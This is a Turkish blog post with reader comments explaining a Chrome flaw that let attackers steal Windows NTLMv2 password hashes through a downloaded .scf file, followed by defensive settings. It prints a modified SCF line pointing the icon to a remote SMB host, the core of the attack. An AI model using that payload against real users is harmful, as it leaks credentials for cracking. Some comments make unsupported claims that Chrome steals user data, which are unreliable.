2017 yılına girdiğimizden beridir bir güvenlik açığı patlaması yaşıyoruz daha geçenlerde sordum.net olarak sizlere 3 oldukça ciddi güvenlik açığı hakkında bilgiler aktarmıştık hemen ardından defensecode web
Chrome tarayıcısı şu anda masaüstü cihazlarda en popüler tarayıcıdır ve varsayılan olarak güvenli dosyaları otomatik olarak (kullanıcıya bildirmeden) indirecek şekilde dizayn edilmiştir işte saldırı da tam bu noktada ortaya çıkıyor gelelim saldırının anatomisine :
Kurbanın Microsoft LAN Manager (NTLMv2) Parola Hash değerini ele geçirmek için saldırgan tarafından kontrol edilen uzak SMB sunucusu kullanılarak hedefteki chrome kullanıcısına bir Windows Explorer Shell Command File (.scf) dosyası indirtiliyor bu dosya Windows 98 den beridir varolan ve genellikle masaüstünü göster kısayolu olarak kullanılan bir dosyadır örneğin
[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop
Bu kod kolaylıkla uzak bir sunucudan Kimlik denetimi doğrulaması için değiştirilebiliyor
[Shell] IconFile=\\170.170.170.170\icon
.sfc dosyası Temel olarak iki bölümden oluşan bir metin dosyasıdır; biri çalıştırılacak bir komutu belirlemek ve diğeri simge dosyasının konumunu belirtmek için kullanılır , Üstteki gibi bir kodda Windows Dosya Gezgini otomatik olarak "icon" dosyasını uzak sunucudan indirecektir inen dosyanın çalışması için tıklanmasına veya açılmaya çalışılmasına bile gerek yok çünkü Windows gezgini bu inen dosyaları otomatik olarak çalıştıracaktır. işin daha da ilginci bu dosyaların Windows gezgini altında uzantıslarının görünmemesidir
Google Chromenin burada suçu nedir ?
Chrome, SCF dosyalarının güvenli olduğunu düşünüyor ve otomatik olarak indirilmelerine izin veriyor oysaki İnternet explorer , Microsoft EDGE , Firefox ve Safari gibi rakip tarayıcılar, SCF dosyalarının otomatik olarak indirilmesine müsade etmiyor. Chromenin bu davranışı güvenlik riski oluşturuyor ve bu sebeplede Bir SMB sunucusunun arkasındaki saldırganlar Windows şifre hash değerlerini kolayca ele geçirebiliyorlar .
Saldırı nasıl gerçekleşiyor ?
Windows kullanıcısı bir web sayfasını ziyaret ettiğinde geriplanda bu sfc dosyası otomatik olarak iniyor veya kullanıcı biryere tıkladığında indirtiliyor , kullanıcı varsayılan indirilenler klasörünü açtığında Windows ikon konumunu kontrol ediyor ve saldırganların elindeki SMB servere Windows kimlik bilgilerinin HASH değerlerini gönderiyor ve ele geçirilern bu şifreler saldırganlar tarafından kırılıyor , bunların kırılmaları ise sadece çok karmaşıklarsa zor görünüyor. Son yıllarda Şifre kırmada GPU ların kullanılması ile işler daha da hızlandı mesela Tek bir Nvidia GTX 1080 kartı için NetNTLMv2 hashcat kıyaslaması yaklaşık 1600 MH / s'dir yani : Saniyede 1,6 milyar hash anlamına gelir ki bu kartladan 4 tanesi ile ; 8 karakterli , Büyük küçük harfler ve özel karakterlerin (! @ # $% &) kullanıldığı bir şifreyi bulmak 1 gün bile sürmemektedir.
Bu açık eğer Windowsunuza Microsoft hesabı ile giriş yapıyorsanız daha da tehlikeli bir hal almaktadır çünkü saldırganlar Outlook, OneDrive veya Office365 gibi online hizmetlerinizin hepsini ele geçireceklerdir. Şuanda Antivirüslerin hiçbirisi bu türden uzak sunucudan inen dosyaları zararlı olarak görmüyor. Google Bu açığı kapatmak için çalışmalar yapıyor olsada kendimizin alabileceği bir önlem mevcut :
1. Chromenin Sağ üst köşedeki üç noktaya tıklayalım ve Ayarlar diyelim
2. Açılan ekranın dip kısmında "gelişmiş ayarları Göster" kısmına tıklayalım
3. İndirlenler kısmında "İndirmeden önce her dosyanın nereye kaydedileceğini sor" kısmına tik koyalım. (Zaten tik varsa korunuyorsunuz demektir)
hernekadar bu işlemlerden sonra Chromenin indirme mekanizmasına bir koruma katmanı eklemiş olsakta , manipüle edilmiş SCF dosyaları hedef sistemlere farklı yollarla indirtilebilir bu sebeple güvenlik risklerini azaltmak amacıyla SMB trafiğinin kullandığı bağlantı noktalarının portları windows güvenlik duvarından engellenebilir Microsoftun bu konuda Buradaki makalesine göre SMB ports 137, 138, 139 ve 445 numaralı portların hertür iletişim ve internet erişimine kapatılmaları gerekmektedir. Bu portların kapatılması , Faks hizmeti, yazdırma biriktiricisi, net oturum açma veya dosya ve yazdırma paylaşımı gibi diğer windows hizmetlerinde aksamalara sebep olabilir , eğer butür hizmetleri kullanmıyorsanız Program ekle kaldır penceresindeki "Windows özelliklerini aç veya kapat" kısmını açıp
Burada yeralan SMB 1.0/CIFS dosya paylaşım desteği kısmının tikini kaldırıp açığı kapatabilirsiniz. ilaveten bakınız 3 Güncel güvenlik açığı Burada
Dediğin gibi chrome malesef kullanıcının hassas verilerini topluyor. resmi bir portablşe sürümü de yok.
chrome hiçbir zaman kullanılmamalı çünkü içinde sürekli farklı zaman aralıklarında çalışıp kullanıcı bilgilierni çalan softwarereporter.exe adında modüller var o yüzden uzak durun chrome yerine srware iron , slimjet , cent browser yada comodo dragon kullanılabilir bu tarayıcıları çok uzun bir süredir chrome yerine kullanıyorum hem ondan daha hızlı hem daha güvenliler ayrıca portable verisyonları mevcuttur
Opera bu tür girişimlere izin vermiyor.Operasız bir net alemi güneşi olmayan dünyaya benzer....!
Güzel yorumunuz için teşekür ederiz Hulki bey , başlık kalitemizi elimizden geldiğince yüksek tutmaya çalışıyoruz.
Yazılarınızı ilgiyle takip ediyorum , Türkçe başka bir kaynakta böylesi bir bilgiye rastlamadım , ve yabancı kaynakları ile vermeniz bilginin güvenilirliğini kanıtlıyor , son zamanlarda rastladığım en kaliteli site , elleriniz dert görmesin
Malesef bu aralar hergün bir güvenlik açığı ortaya çıkıyor dikkatli olmakta fayda var
Bende çok gariplikler vardı ve ayarları dediğiniz gibi yaptım. bakalım neler olacak